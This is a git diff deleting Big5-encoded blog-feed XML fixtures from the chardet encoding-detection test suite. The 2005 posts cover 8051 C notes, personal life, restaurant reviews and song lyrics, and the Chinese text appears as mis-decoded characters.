    diff --git a/chardet/tests/Big5/blog.worren.net.xml b/chardet/tests/Big5/blog.worren.net.xml deleted file mode 100644 index 9e4878c..0000000 --- a/chardet/tests/Big5/blog.worren.net.xml +++ /dev/null @@ -1,296 +0,0 @@ - - - - Worren's Blog - - Worren's Blog - 2005-12-27T11:12:12Z - Copyright 2005 - WordPress - - - - Worren - - Keil C Compiler ₪₪ֲ_×÷¼g×k - - http://blog.worren.net?p=80 - 2005-12-27T11:11:09Z - 2005-12-27T11:09:50Z - - LCD/¹q₪l¹q¸פ ₪ג¥¾ - 8051 Note [ֲא¸] http://ehome.hifly.to/showthread.php?threadid=1972 - - -static void TF0_ISR(void) interrupt TF0_VECTOR using REG_BANK_1; - - -interrupt «ב­±±µµ₪@­׃number¡A³o­׃number¥N×ם8051×÷₪@­׃₪₪ֲ_¡C - -½׀¬d§A×÷µ{¦¡₪₪¡@TF0_VECTOR ©w¸q×÷number¡AµM«ב¬dKeil C ×÷menu×÷interrupt number×÷×ם®ז¡A§Y×¾¬O¨÷₪@­׃₪₪ֲ_¡C - -8051×÷register¦³¥|­׃bank¡Ausing«ב­±¬O«©winterrupt routine ­n¥־¨÷₪@­׃ bank¡C₪@¼ֻ¬dREG_BANK_1×÷©w¸q§Y×¾­n¨ֿ¥־¨÷₪@­׃ bank¡C - -±q©w¸q×÷¦W÷¦r¸q¨׃¬ -TF0_VECTOR ¡@ְ³¬Otimer 0 -REG_BANK_1¡@ְ³¬O 1 - - - - Worren - - C ×÷°ע¥»¦ל₪¸¾§@²ֵ¸¹ vs byte¸ך®ֶ«¬÷A - - http://blog.worren.net?p=79 - 2005-12-27T11:12:12Z - 2005-12-27T11:07:56Z - - LCD/¹q₪l¹q¸פ ₪ג¥¾ - 8051 Note i=24 , ¥H₪G¶i¦ל×ם¥ 0000000000011000 -i=16, ¥H₪G¶i¦ל×ם¥ 0000000000010000 - - -(1) &#038; ¥B - 0000000000011000 -&#038; 0000000000010000 ------------------------------- - 0000000000010000=16 - -(2) | ©־ - 0000000000010000 -| 0000000000011000 ------------------------------- - 0000000000011000=24 - -(3) ~ ₪ֿ -~ 0000000000010000 -------------------------------- - 0000000000011000 - 1111111111100111 =-25 - -item 3 ... - - - - Worren - - haha ~ .. °÷q₪סֱֹ - - http://blog.worren.net?p=78 - 2005-12-13T10:57:20Z - 2005-12-13T10:56:53Z - - ₪@¯כ - Life ©ת₪ׁ­n¶i₪J¨Mֱֹ₪F! ¨ה¹ך·ם×ל»¡×לֱֹ¨ת15¦W, ₪J³עְ³¸׃₪£ֳר ! ... ¬O¦p¹w´ֱ¯כ¦a₪J³ע₪F ! - -©ת₪ׁ´N­n°¨Mֱֹ₪F, ₪µ₪ׁ₪´µM¦£µ§₪גֳה×÷₪u§@ . ₪U¯Z®ֹ¶¡¨ל₪F, ¦b¸עEE °Q½׳₪@¹q¸פ×÷°ֳD , ¦¹®ֹ³B×ר¦ׁ₪j±q»·»·₪@÷¨«¨ל§¸ע«e, ©ח₪F₪@₪U§®א«e×÷¹j×O»¡ : ¼K~ .. ©ת₪ׁ§A­n¥h₪סֱֹ°ױ~?¦³¥[×o¹־¶? ³o¬O₪@©w­n×÷£¬~~ - -ha ~ ... ³B×ר©³₪U¦³¦¦h₪H, ₪]₪י²z¸U¾ק , ֱ¥H¬°¥L₪£·|×¾¹D§³o­׃₪p©@ ~ .. µ²×G¥L»¡¥L«e°}₪l¦b₪j³°¬₪½§Gִז¦³¬¨ל§×÷¦W₪l´N·Q"¼K~?³o₪£¬O§®a×÷₪H¶~~" .... ha ~ ..... ₪£¾ו±o¥L«ח·|°O±o§³o«₪ײ¦b¥L¸ע«eµo¨¥×÷₪H! ... ^_^" - -©ת₪ׁ±₪W³¡×ש¦³¶}½ׂ, ₪j·§¥u¦³§U²z·|¹L¥h³­§§a ! ... :P .... ³B×ר­n§±o₪@­׃³ּ¨־³y«¬¼ת .. ~"~ .... pls ~..§³o÷״±o©×÷₪H«ח§ך¥X³ּ¨־³y«¬£«~?₪j·§±o¬ן₪B¦r¿ַ₪~¦³¾ק·|§a! ... ¥i¥H±o³ּ¸׃¦÷³y«¬¼ת! .... ... - - - - Worren - - ´־²y²z½׳ - - http://blog.worren.net?p=77 - 2005-12-13T07:44:04Z - 2005-12-13T07:44:04Z - - ₪@¯כ - Heart ±q×B₪ֽ FW µ¹§×÷ mail ¬¨ל×÷ .... - -¸`¿‎ start ....... -×½¨ל¦³₪@₪ׁ¬´־²y¡A§©¿µM»ג®©₪F₪@­׃ְ³µ××÷²z½׳¡G - - ¦p×G§¬O­׃¥´ְ»₪ג×÷¸¡Aֱ`₪£¸׃₪°»ע²y³£¥´§a¡I - - ְ³¸׃­n¿ן¦n²y₪~¥´¡A¦p×G¦o§כ¥X×÷¬Oֳa²y¡A - - ¨÷»ע§·F¹ְ₪@×½´§´־©O¡H -¸`¿‎ end ........ - -₪H©M₪H₪§¶¡×÷¬³B₪]¬O , -±¡«Q©M₪ׂ©d₪§¶¡´N¹³¬Oֱ‎²y×÷±׀½m©M¥´ְ»₪ג -ֲ¾³ץ¶¡¦P¨ֶ/¸ף³¡×ש´N¹³¬O"¼ִ¶₪"×÷§כ₪ג©M¦₪v(¥´ְ»₪ג) ... -­Y¬O¹ן₪ט»¡₪F or °µ₪F₪°»ע¥O¦₪v₪£µ־×A×÷¸ or ¨ֶ`.. -¨ה¹ך... ¨Iְq(₪£´§´־)©־³\¥i¥Hֵ‎³\¦h₪£¥²­n×÷°ֳDֱ׳§K±¼! - -´N¹³¬O§כ¥X₪Fֳa²y, ­Yµw¬O¥h´§¥i¯א¬O°×­¸²y±µ±‏, ₪]¥i¯א¬O -÷u¦a²yֲש±‏........ - -¨C­׃₪£¦P²ױ¦X×÷¥כ¦ס³£¦³¨ה¯S©w×÷¬³B¼ׂ¦¡, ¦³®ֹ­װ§·|₪£¸g·N -§כ¥Xֳa²y, ­Y¹ן₪טְ´±o§װ₪U ~... ¨÷´N₪£·|¦³×§°ץ! ¬¹ן¦a­Y¹ן₪ט -₪]¬O§כ¥Xֳa²y₪F ~ .... §₪]­n¾A«׳¦a§װ₪U, ..... ְ´×÷×Y½א©¼¦¹×÷ -ְuֲI, §װֵ‎¹ן₪טµL¶ֻ₪j¶®×÷¯ֲI(or³ֵw¹ן₪ט×÷¯ֲI!) .... ₪@₪ֱ³£ -·|«¦n go .... :) - - - - - Worren - - ₪k₪j18ֵ? - - http://blog.worren.net?p=75 - 2005-11-26T16:24:33Z - 2005-11-26T16:13:36Z - - ₪@¯כ - Heart ha ~ .. ­ט­ט§ה₪F®]²Q´A·s±M¿ט×÷ VCD , -(ֱ¥H¬°¬OKTV°ַ ~...:P) ... - - -¬₪F¦o×÷·s³y«¬, ¦h₪F₪@×ׁ¦¨¼פ×÷₪k₪H¨‎, -₪]§ג₪§«e×÷₪ת®M®³±¼₪F ! .... ¥[₪W¦o×÷÷qֱn ~.. -¨‏, ₪k₪j¯u¬O18ֵ£«! ... ֵ¬₪F, ¦±­·₪]₪ס¸ -»´§ײ₪@ֲI(but ֱ¬O¦³«¦h´d«s×÷!...@@a) - -©M₪‎ֳׁ½ו¦X°×÷"§A¬O§×÷·ֵ¬u" ֱ¯u¬O¸ץ²ז₪§ -«e×÷­·®ז! ....MV₪₪×÷³y«¬ִ±±o¶W¯ֵ¬×÷ ~ .. :P - - -₪µ₪ׁ¥h°×₪₪×÷®ױ₪ֽ·|...-"- ...³Q¦P¾ַ©װ¥h×÷! .. -₪§«e¦ׁ®v¥´¹q¸µ¹§§³£·Q¿ל×k±ְ±¼₪F ~... µ²×G -ֱ¬O³Q¦P¾ַ©װ¥h₪F ! ... :P ...btw, ¬O¦X°¹־ -¸ּ°₪@¦P©¡×÷~... ¦o, ¥H«eֱ¯u¬O₪£«ח°_²´, ´N -«³ז¯ֲ×÷₪@­׃₪k¥ֽ! ²{¦b ~...«z¶כ, ´X¦~₪£¨£, °ב -₪F₪j¾ַ, ¥X₪F×ְ·|.... ¦o³£¨Sֵ¦ׁ, ¦‎¬O¬ןµ₪W«o -¦h₪F¦n₪@₪ְ₪k₪H¨‎~...¦o₪]¬O©M§©f₪@¼ֻ§b»ָ¦ז×÷! -but ´N₪£₪׃×¾¹D¬Oװ£³¡×ש, ¥u×¾¹D¦o«¦£~ ..always -on line ! .. @@a ...₪j·§¬O°₪@¦P©¡×÷, ... - - - - Worren - - ´c§@¼@₪§§k - - http://blog.worren.net?p=74 - 2005-11-26T16:12:45Z - 2005-11-26T16:12:45Z - - ₪@¯כ - Life ²{¦b₪S¦b¼½´c§@¼@₪§§k¥xֶWש .... -×L¨ּ±ב¦n¥i·R ~....¨‏¨‏ ~..... -µL½׳¬O¬ן÷פ²y¸ֻ, ¥נ¶¢¸ֻ, ²Q₪k¸ֻ,....³s÷־¦ח³£¦n¥i·R !.. :P - - -­Y§¦³­׃°¨₪l¹³¦o¨÷»ע¥i·R´N¦n₪F ! ..... XD -¼@₪₪¨k¥D¨₪¹ן¦o¯u¥ ! .... - -¥i¬O,...... §¦₪v₪]«¥ ~... -¥i·R₪k«ְִ³¸׃·|³Q§ְ~¶]§a ! .... -ha ~ ... ¥‎­׳₪@₪U¦₪v×÷§¾®נ§a ! - -¨‏ ~...¦³₪H»¡, ¨S·Q¨ל§¬O₪@­׃·|¥h¬°¸¹³¼@×÷₪H ! -but §₪]₪£¬O¨C³¡³£¬~...°¸¹³¼@¹ְ~...·םµM´N¬O¸ּ­± -×÷₪H¥i·R×÷¸´N¬°ױ ! .... :P - - - - Worren - - ₪p«ִ₪l½t - - http://blog.worren.net?p=73 - 2005-11-26T16:12:04Z - 2005-11-26T16:11:43Z - - ₪@¯כ - Life ´¿´X¦ף®ֹ ~ .. §³£₪£×¾¹D§¨÷»ע¦³₪p«ִ₪l½t ! - - - -³£₪w¸g§ׁ°O¬O₪°»ע®ֹ­װ₪F, ְ³¸׃¬O§°×₪₪₪§«e(§t)§a ~? -₪p«ִ₪l, ¯S§O¬O5·³¥H₪U×÷₪p×B₪ֽ ~.. ¹ן§¦³÷״®£ִ·P ~... -¾F©~×÷₪p«ִ¨ל§®a×±, ¬¨ל§, ³q±`₪W²ִ₪@¥ף¨ֶ´N¬O´eµ! -µM«ב§₪W«e×÷¸, ´N¬O§₪¨ל¦a₪W&#038;₪j­ת! - -₪µ₪ׁ¥h¾ַ©n®a©M©n₪ׂ³₪@×M(¨ֶ¹ך₪W¬O¦]¬°§ְ°¦o­ּ§ֻ₪@¥x·s¹q¸£ -₪µ₪ׁ¥h¦w¸ֻ!)... ³¨ל11ֲI¦h, §¨£×¬2­׃₪p«ִ₪l³£¶}©l·Rµt₪F~~... -´N´£¥X­nֲק¶}₪F ~....§Y¨ֿ°sֱ¨S³§¹°ַ ~....... - -µ²×G ~... ha ` ... §¦b×ש₪fֵ¥¨ל¦ׁ₪j(­פ­פ)¦b¸ע¶‎¶‎§n ~.... -­ל¨׃¬O·Q­n§µ¹¥L©ך©ך ~...:P ..... ·םµM§´N¦V«e§ג¥L©ך°_¨׃ -µ¹¥L»¡₪F₪@¨ַ¦n¸ ~..₪°»ע"­פ­פ³ּ¨ִ₪F, ³£·|ְ°¶‎¶‎·׃ֵU©f©f...." -"÷־«e­n¨ך₪ת~.." .... - -¥L₪~×ײ©ס§¨« ~... ha ~ ... - - -₪£¾ו±o¬O₪°»ע®ֹ­װ ~..§¶}©l¦³₪p«ִ₪l½t ~.... ְ³¸׃¬O¦]¬°¥h₪F»ט¼ז -°ך₪p§a ~ ...±q¨÷®ֹ­װ­±¹ן₪p×B₪ֽ×÷®נ₪£¦A¬O₪@³¯₪£ֵ, ₪£¹³¬O¹ן₪j -₪H₪@¯כ, ¦b»ט¼ז, ¥®¸X¶י×÷₪p×B₪ֽ¨£§, ֱ·|צ¨ל§¨­₪W°ַ ~..₪]·|­n§©ך -¥L/¦o­ּ ~ ....ha ~...¯u¬Oֳר¥H·Q¹³! ... ₪µ₪ׁ¨ל»ט¼ז&#038;¾ַ©n®a ~₪j·§§×÷ -¼ֹ©ׁ₪§®נ₪ײ₪F«¦h(°«eXX ... - - - - Worren - - ³ּ·R×÷₪H₪£¨£±o³ּ«ב´N¬O·|¦b₪@°_ … - - http://blog.worren.net?p=72 - 2005-11-23T16:29:18Z - 2005-11-23T16:29:18Z - - ₪@¯כ - Heart -¦³·P¦׃µo - -¥@¶¡¨ֶ´N¬O³o¼ֻ! -³ּ·R×÷₪H₪£¨£±o´N¬O³ּ«ב¦b₪@°_×÷¨÷­׃₪H! -©־³\¬O¥ֽ©R¦ס«Q₪₪´¿¸g§ך÷tµ¦A¥­±`₪]₪£¹L×÷¨₪¦ג×÷¨÷¦ל~ - -¥¢¥h«ב₪~·Pִ±¨ל, ¦A₪£°_²´×÷₪p¬ג₪l, ¥ק¶q­ל¨׃¬O¨÷»ע¦a­«! - - - - Worren - - ¦ׁ®v, ¹ן₪£°_ … - - http://blog.worren.net?p=71 - 2005-11-22T02:15:42Z - 2005-11-22T02:15:42Z - - ₪@¯כ - Life ¸»¡¬Q₪ׁ .... ₪ָ¥נ®ֹ¶¡ ... ÷¿²ת¥S§ּ×÷¹aֱnֵT°_ ! .. «z°ַ, ½ײ¦b³o÷״®ֹ­װ¥´¹q¸¨׃°ַ!? -¬¸¹½X? ... ¨S¬¹L! ±µ°_¨׃ֵ¥?... ֱn­µ«¼פ±x! but ₪£×¾¹D¬O½ײ! - - -¹ן₪ט: §A¦b÷־ִ±¶? -§: ¹ן£«! -¹ן₪ט: §A¬Q₪ׁ½¯Z£«? -§: ¨S°ױ , ²{¦b¬O₪ָ¥נ®ֹ¶¡! ©pµ¥₪@₪U¦A¥´µ¹§°ױ! -¹ן₪ט: £¬~~ ... ¨Sֳצ«Y, §Aֵ¥´N¦n₪F~... ®ױ×ר»¡.......... -§: ... ||| ...... ©p... ¬O¦ׁ®v! ¹ן₪£°_, §¨Sֵ¥¥X¨׃... £­~... ֳצ©ף¨÷¥ף¨ֶ, §­n¬§×÷ schedule ....... -¦ׁ®v: ¹ן°ױ, §¬O¦ׁ®v°ױ! ¦n°ױ, ¨÷§A­nµ¹§¦^ְ³£¬! ... ₪£­n§ׁ°O¼K! - -..........©ַ₪F, ₪£³£¬O¾ַ§ּ¦bֱpµ¸×÷¹ְ ~ ... ₪j·§®ֹ¶¡₪ס¸÷ע­¢, ... - - - - Worren - - ¹L₪F³o­׃§ר,´N¨S³o­׃©±₪F? - - http://blog.worren.net?p=70 - 2005-11-22T04:27:24Z - 2005-11-20T16:13:02Z - - ₪@¯כ - Life ³ּ×ס¸ע₪@­׃×B₪ֽ²ב°_³o¥y¸! ְ³¸׃¬O»¡§¦b¸ע¥L»¡³o¥y¸! - -₪£¹L, §·Q, ְ³¸׃₪]±o¹ן§¦₪v»¡»¡³o¥y¸! ¾ק·|₪@¦‎·ָ¨«₪F, ´N₪£·|¬O§A×÷₪F! ֱ¬O§ײ·Q·Q§O×÷¨ֶ§a ! - - \ No newline at end of file diff --git a/chardet/tests/Big5/carbonxiv.blogspot.com.xml b/chardet/tests/Big5/carbonxiv.blogspot.com.xml deleted file mode 100644 index 19c86b0..0000000 --- a/chardet/tests/Big5/carbonxiv.blogspot.com.xml +++ /dev/null @@ -1,216 +0,0 @@ - - - - - - -MARZ ®ז₪l - - -tag:blogger.com,1999:blog-8569759 -2005-11-05T04:55:56Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -marz - -2005-05-22T14:14:00-04:00 -2005-05-25T22:41:51Z -2005-05-22T18:16:02Z - -tag:blogger.com,1999:blog-8569759.post-111678576293144880 -Marz's moved...®ז₪l₪w·h®a - -
    -Hi everyone, I've finally moved.
    Here's the new address: http://www.carbonxiv.com/.
    Please update (if any of you linked me)...
    -
    ·s¦a§}¬O: http://www.carbonxiv.com/.
    ¦³³sµ²×÷¸, ³ֲ·׀§ף·s₪@₪U...
    -
    ================================================
    Yes... Marz's been disappeared for awhile.
    ¹ן°! ®ז₪l¦n¹³¥¢ֲ₪@°}₪l₪F.
    -
    Didn't reply to any of your comments,
    nor post any new stuffs here.
    ¨S¦³¦^§A­ּ×÷¦^ְ³, ₪]¨S¦³·s₪ו³¹.
    -
    Because I just finished importing the posts from Blogger to Word Press. *Finally*
    It took me 2 tries. The first failure was because I've uploaded to the wrong dir.
    ³o¨ה¹ך¬O¦]¬°§­ט­ט₪~²׳©ף§ג³o¸ּ©ׂ¦³×÷₪ו³¹²¾¨לWord Press¥h.
    ¹ֱ¸ױ₪F¨ג¦¸, ²ִ₪@¦¸¥¢±ׁ¬O¦]¬°×F¦ט³Q₪W¸¨ל₪£¹ן×÷¦a₪ט.
    -
    Originally, I was thinking I'd post the new URL here once everything's finished.
    But I gradually figured that I wouldn't be able to finish all the renovation very soon.
    *with the current pace*
    ¥»¨׃·Qµ¥¨ל©ׂ¦³×F¦ט°µ§¹«ב₪~§ג¦a§}₪½§G,
    ¦‎÷C÷C§´Nִ±±o, ¥H§²{¦b×÷³t«׳, ­n§×÷·s®a§¹¥‏¸ֻ­׳¦n, ¨ֳ₪£·|¬Oµu®ֹ¶¡₪÷×÷¨ֶ.
    -
    And some of you have actually discovered my new home.
    HAHA =)
    ¦׃¥B§A­ּ₪@¨ַ₪H₪]₪w¸gµo²{₪F§×÷·s¦a§}₪F.
    -
    So, I'll announce my new address here now.
    *It's really raw, so if you go there, don't laugh at me =D*
    ©ׂ¥H§¨M©w²{¦b´N§i¶D§A­ּ§×÷·s¦a§}.
    *§A­ּ¨£¨ל, ¥i₪£­n¯÷§³ב! ¦]¬°·s®aֱ¬O«ִך, «°ע¥»×÷.*
    -
    Feel free to post any comment there.
    ½׀¦h¦h«±׀!
    -
    -
    -
    -
    -false -
    - - - -marz - -2005-05-20T02:03:00-04:00 -2005-05-20T06:13:16Z -2005-05-20T06:03:25Z - -tag:blogger.com,1999:blog-8569759.post-111656900572004590 -testing - -
    testing 123...
    -
    -
    -...marz's new site is under construction... -
    -
    -
    -
    -false -
    - - - -marz - -2005-05-17T13:38:00-04:00 -2005-05-17T17:49:01Z -2005-05-17T17:49:01Z - -tag:blogger.com,1999:blog-8569759.post-111635214189894274 -Being a straight... - -
    -hair person do have lots of advantages. At least you don't have to blow dry your hair everytime you wash your hair. -
    - -
    -Saturday, I finally made the decision. -
    - -
    -I had to straighten my hair! -
    - -
    -I've been thinking of doing my hair for so long. But the 6-7 hour wait is just holding me back from doing it. Everytime I thought of sitting in the Salon for that long, I'd say "forget it!" -
    - -
    -Well... It's straight now, and I won't have so much trouble w/ my hair for awhile. -
    - -
    -Good Job Marz! (Padding my back ^^) -
    -
    -false -
    - - - -marz - -2005-05-15T18:46:00-04:00 -2005-05-17T17:37:55Z -2005-05-15T23:00:45Z - -tag:blogger.com,1999:blog-8569759.post-111619804526739510 -ִ~ִע³V­¹ Food searching cont'd... -<span style="font-size:130%;">Dined out a few times this week, but didn't find any real good restaurant.<br />So-so, so-so, and so-so.<br /><br />Went to the i-cook buffet near Warden and Steeles.<br />(Haven't had any hot-pot/shabu shabu since when?...)<br />Wednesday night, around 7:30p.m. There weren't a lot of customers at i-cook.<br />Yes, Wednesday is supposed to be like that.<br />But don't forget,<br />right now all university students are having their holidays.<br />Done w/ exam and not yet started summer school.<br /><br />We ordered the seafood buffet for $17.99 (i.e. with $3 more, you'll get oysters, crabs, and some better veggies, plus all you can drink pops and other drinks) . The soup base we ordered was (1) Lobster base w/ 1 lb. of lobster for $9.99, (2) Mushroom soup base $3.99, and (3) Lamb + chinese herb (Dong-Guai) soup base $3.99.<br /><br />The environment there was quite good. I'm sure most of the people will remember the big "round" screen TV there. It was playing S.H.E. and Jay Chou's Concert that night. The service was pretty good. They were pretty polite and often come by to see what we need.<br /><br />Now, let's talk about food selections. The thing I really like it the wide variety of sauces you can mix together yourself. (that's why it's called "i cook" right!) The food quality was average. There're quite a lot of fish/crab/lobster/shrimp/meat balls you can dump and cook in the soup. Unfortunately, the shrimp and the crab there were just NOT FRESH. I was kind of disappointed. Anyone can tell the shrimp was unfresh by just looking at the texture.<br /><br />I would say... the overall experience was so-so. The total came to be around $90 for three persons, and I don't think I'd recommend you going.<br /><br />=================================<br />Went to Kelsey's on the same plaza (Steeles and Warden) on Saturday night around 9:30pm. It was a rainy night and there weren't a lot of people on the street or near the T&T supermarket.</span><br /><span style="font-size:130%;">Remember there was a period of time when I went to Kelsey's quite often. I especially liked the one on Steeles and Woodbine. It was relatively old; with the dim lights and not so many patrons, it gave me this feeling of escaping from the city and back to the 60's. Another special note is that this restaurant is not smoke-free. You can just sit in the designated area (an open area, not those little smoking room) and have a cigar or so. Yea,... but it's no longer there now. There now stand the restaurant/pub (not sure) called drInk. Haven't been there though.</span><br /><span style="font-size:130%;"></span><br /><span style="font-size:130%;">Yea... back to the topic. We went to the new Kelsey's and it was kinda late for dinner time. The main reason why we went to Kelsey's was partly because it was pretty close and we couldn't think of other places, also because we wanted to have the ribs. Unfortunately, they were out of ribs! Sigh... So what we ordered was a steak, a steak fajita and an onion soup... All of them were just so-so. No surprises... (yes, what do you expect?). I found it pretty hard to get a good french onion soup... So far, I think the one at the KEG is relatively good. Still remember how salty the one was at the La Biftheque. The one at </span><a href="http://www.tickledtoad.com/"><span style="font-size:130%;">Tickled Toad</span></a><span style="font-size:130%;"> was a bit different from the other ones, but it was just ok (I basically just went there for the Monday wing special.) Arh... I really love the cheese on top of the french onion soup.~~~~</span><br /><span style="font-size:130%;"></span><br /><span style="font-size:130%;">==================================</span><br /><span style="font-size:130%;">Another restaurant revisited was the "¦ֻ¾פ" at Commerce Gate.</span><br /><span style="font-size:130%;">Suddently wanted to have Japanese noodle... and couldn't think of anywhere I could get that... so drove up to the Commerce Gate and had the noodle there.</span><br /><span style="font-size:130%;">Actually I really haven't had the noodle there before (except once I ordered a plain noodle w/ seaweed because I wasn't in a mood to eat that night). How it turned out this time? Wasn't too good. I guess I wouldn't go there (at least not when I'm the one making decision) next time. The Curry pork rice was so-so, the spicy tuna roll and the house noodle only scored a 5 out of 10. ><</span> -false - - - - -marz - -2005-05-12T23:11:00-04:00 -2005-05-13T03:14:01Z -2005-05-13T03:14:01Z - -tag:blogger.com,1999:blog-8569759.post-111595404118918831 -MSN space... - -
    -Hum~
    installed the msn messenger 7.0.
    lots of new features...
    the first thing i'm doing is...
    again
    start up a new page
    and occupy the name of "carbonxiv".
    -
    Here's my msn page. -
    Wonder if I'd use that though.
    -
    -
    -
    -false -
    - - - -marz - -2005-05-12T21:10:00-04:00 -2005-05-13T01:23:10Z -2005-05-13T01:23:10Z - -tag:blogger.com,1999:blog-8569759.post-111594739008367548 -¨{ְֲ²´®iִ‎ - -
    -ֲ½µ±i·R¬ֲ×÷¡m¬y¨¥¡n¡A¬¨ל¨ה₪₪×÷₪@¬q¡G
    -
    -
    -...³ּ×ס§¦b₪@¥»­^₪ו®ׁ₪W¬¨ל¨ג¥y¸¡A­ֹ¨׃½|¨÷÷״¹ן©ף¦₪v¹L¥ק·P¨ל¿³½ל×÷§@®a¡A­ֻ¬O«D±`₪ֱ·ם¡G¡y¥L­ּ×ב¶O₪@½ת₪l×÷®ֹ¶¡ְ¬¦₪v×÷¨{ְֲ¡A¨ֳ¥B·Q×k₪l´M§ה¡A¥i¦³¨ה¥L×÷₪H₪]·P¨ל¿³½ל×÷¡A¥s₪H®a₪]¨׃ְ¬¡C¡z§³o÷ג₪£÷ג¨{ְֲ²´®iִ‎¡A§¦³ֲI÷ֳ₪¡A¦‎₪]ֱ¬O¼g₪F¡C -
    - -
    ִ±±o¦₪v₪]¦³ֲI¨{ְֲ²´®iִ‎₪§¶¡A¦‎₪£ְ₪]ְ₪F¨÷»ע₪[₪F¡Aֱ¬Oִ~ִעְ¢A¼g§a¡C
    -
    -
    -false -
    - - - -marz - -2005-05-11T01:34:00-04:00 -2005-05-11T05:34:21Z -2005-05-11T05:34:20Z - -tag:blogger.com,1999:blog-8569759.post-111578966074963564 -­·×צ¨ּµM - -
    -­·×צ¨ּµM
    -
    ±q¨׃¬O§°Q¹½×÷ ©@°״©± ­«¨׃₪Sִ±±o³o¸ּ
    ³÷µM₪£°Q¹½ ₪׳¨ה¬O³o₪ׁ¬ש©w«e«׳ ¨£­±
    -
    ¸¨¦a₪jµ¡×÷¨÷­± ֱc²±₪]¦n₪ס©¹¦~
    ¬ש₪F§×÷«o¥¼¨£ ¦³₪H³s₪ג¾ק³£ °½¬´X¹M
    ¥ױ₪י¹¿פ¥‎µo²{ «e­±¦³±i§³ּ¼פ×÷ֱy
    ¦¯כ¸»y ְ‏¶¡¯B²{ ¦b³ןִV¶¡²V¾װ
    -
    * ­·×צ¨ּµM ²{¦b ₪S¦b§­±«e ₪ְ¶}´X¦~ ©®ז ¦U¦³ֲI§ןֵ
    ¦A¦¸¸IְY ₪£×¾ ¦³¦ף·sµo²{ °ֲֲא³{¦b ₪S¦A³ז¨­¨÷₪ׁ
    ±¡·P½u ¯א§_¦A ³q¹q *
    -
    ₪י©]¦bµ¥×÷¬ש·| ½ײ®ֶ¨לµ¥¨¬₪C₪K¦~
    §₪wֵ±o°ק­@© ¹ן¨k«ִ×÷₪£ֵש ₪£·|¥ֽ«ט
    ¾ת÷ֹ¸U₪d×÷¸ױ·ׂ ¥‏¬°±µ₪ׁ¨ֿ³ּ«ב₪@½b
    §A×÷¥פ© §A×÷¿נ¼פ ­ל¨׃µL¥iֱ׳§K
    -
    Repeat *
    -
    ­·×צ¨ּµM ´N¹³ ¬O²ִ₪@§׃ִ@
    ₪ְ¶}´X¦~ ­ל¨׃ ֱ¯d§Cµך½u
    ¦A¦¸¸IְY ¦¬÷ע ³ּ×ר×÷±¾©ְ
    ©R₪׃µu ­Wֵ´X³ץ ₪j·§ ±´ְIֱ`­n§¹
    ¬yֲק®ֹ¥N ִ@¥H³o½gְ£¨ק ¨׃µ¹§ ֱ₪@­׃ ₪ִ@
    -
    ÷ֹ¶q§ך±o«¦ׁ½m ¨׃°§A¥i¦³¹ן¶H±ְֲֻ
    §A«µ§A ¯÷±oְSµֹ ¥O₪H₪´₪³n ₪³n ¹³¥H«e
    -
    ±q«e¦@§A¬¬ש³o©@°״©±
    -
    -
    -
    -false -
    - - - -marz - -2005-05-10T23:33:00-04:00 -2005-05-11T03:40:18Z -2005-05-11T03:40:18Z - -tag:blogger.com,1999:blog-8569759.post-111578281822020179 -ֱ¬Oִ±±o§A³ּ¦n - -
    -ֱ¬Oִ±±o§A³ּ¦n
    (Finally I changed the template back to GREY; Still like this better)
    -
    ¦‎§₪£ְ´»¡±N¨׃ ¦‎§ְR«©pֲk¨׃
    ¦b³o₪¦ַ×÷§N¥V ¦@§A¼צ¯P¦A¬³{
    ¥‏¬O§×÷¬¹
    -
    ¦‎§₪£ְ´»¡±N¨׃ ¦‎§ְRְR«©pֲk¨׃
    ¦b³o¬K­·¬מ«B₪₪ ¦@©pִ@±ז₪w₪£¦P
    ֱ¬O¦³ֲI¬G¹ ·Q¶ֹ¦R
    -
    *₪@₪ֱ¨ֶ±¡ֶJ¦₪@µ·­W´o ¦^¬©p§×÷¸פ
    ¬O±¡¬O·R¬O½t¬Oµh ₪µ₪י§«o³÷³£₪£×¾¹D
    §¨ּµM ¦׃§³÷µM ֱ¬Oִ±±o©p³ּ¦n
    -
    #§Y¨ֿ©pֲק¶} §¼צ±¡¥¼§ן
    ³o÷©×ר©]¸ּ ½ײ₪H¬O©p©ׂ·R
    ×ב₪£¦²±¶} ·R÷¥¦p₪j®
    °²¨ֿ©pֳh©ְ§ ¬°¦ף¿W³B·P´n
    §Y¨ֿ©pֲק¶} §¼צ±¡¥¼§ן
    ³o÷©×ר©]¸ּ ½ײ₪H¬O©p©ׂ·R
    -
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/catshadow.blogspot.com.xml b/chardet/tests/Big5/catshadow.blogspot.com.xml deleted file mode 100644 index 3196690..0000000 --- a/chardet/tests/Big5/catshadow.blogspot.com.xml +++ /dev/null @@ -1,261 +0,0 @@ - - - - - - -CatShadow -¡׀¿¡׀¼v¡׀CatShadow¡׀¿¡׀¼v¡׀CatShadow¡׀¿¡׀¼v¡׀CatShadow¡׀¿¡׀¼v¡׀CatShadow¡׀¿¡׀¼v¡׀CatShadow - - -tag:blogger.com,1999:blog-7743578 -2005-08-26T18:53:41Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Letter Lego - -2005-06-24T01:57:00+08:00 -2005-06-23T18:23:15Z -2005-06-23T17:57:18Z - -tag:blogger.com,1999:blog-7743578.post-111954943830396990 -²§¦¸₪¸₪כ -<div style="text-align: left;"><span style="font-size:85%;"><a href="http://www.flickr.com/photos/greatwork/21117979/" title="photo sharing" target="blank"><img src="http://photos17.flickr.com/21117979_957a37bb91.jpg" class="flickr-photo" alt="" / width="400" height="300"></a><br /> <span class="flickr-caption"><a href="http://www.flickr.com/photos/greatwork/21117979/" target="blank">MoonRise OVER OAKLAND AMTRAK - 4</a>,<br />originally uploaded by <a href="http://www.flickr.com/people/greatwork/" target="blank">Greatwork</a>.</span></div><br />«״¿v×÷²׃¸`§ֿ©»₪ג₪u÷כ²׃µe©־¹q¸£3Dֳ¸¹ֿ¡F<br />ֱִ­±×÷×קִ¥ת¿A¦³÷״¹L«׳¯u¹ך×÷¿שִ±¡F<br />¦׃¾נ×÷¨¥ת­±³y¦¨₪@÷״ֱY₪p¼ׂ«¬(dollhouse?)×÷½ט·P¡F<br />©]×ֵ₪₪×÷¶ך₪כ»P³o¦a­±₪W×÷₪@₪ֱ¡A¨ג­׃×ֵ¶¡·P¡C 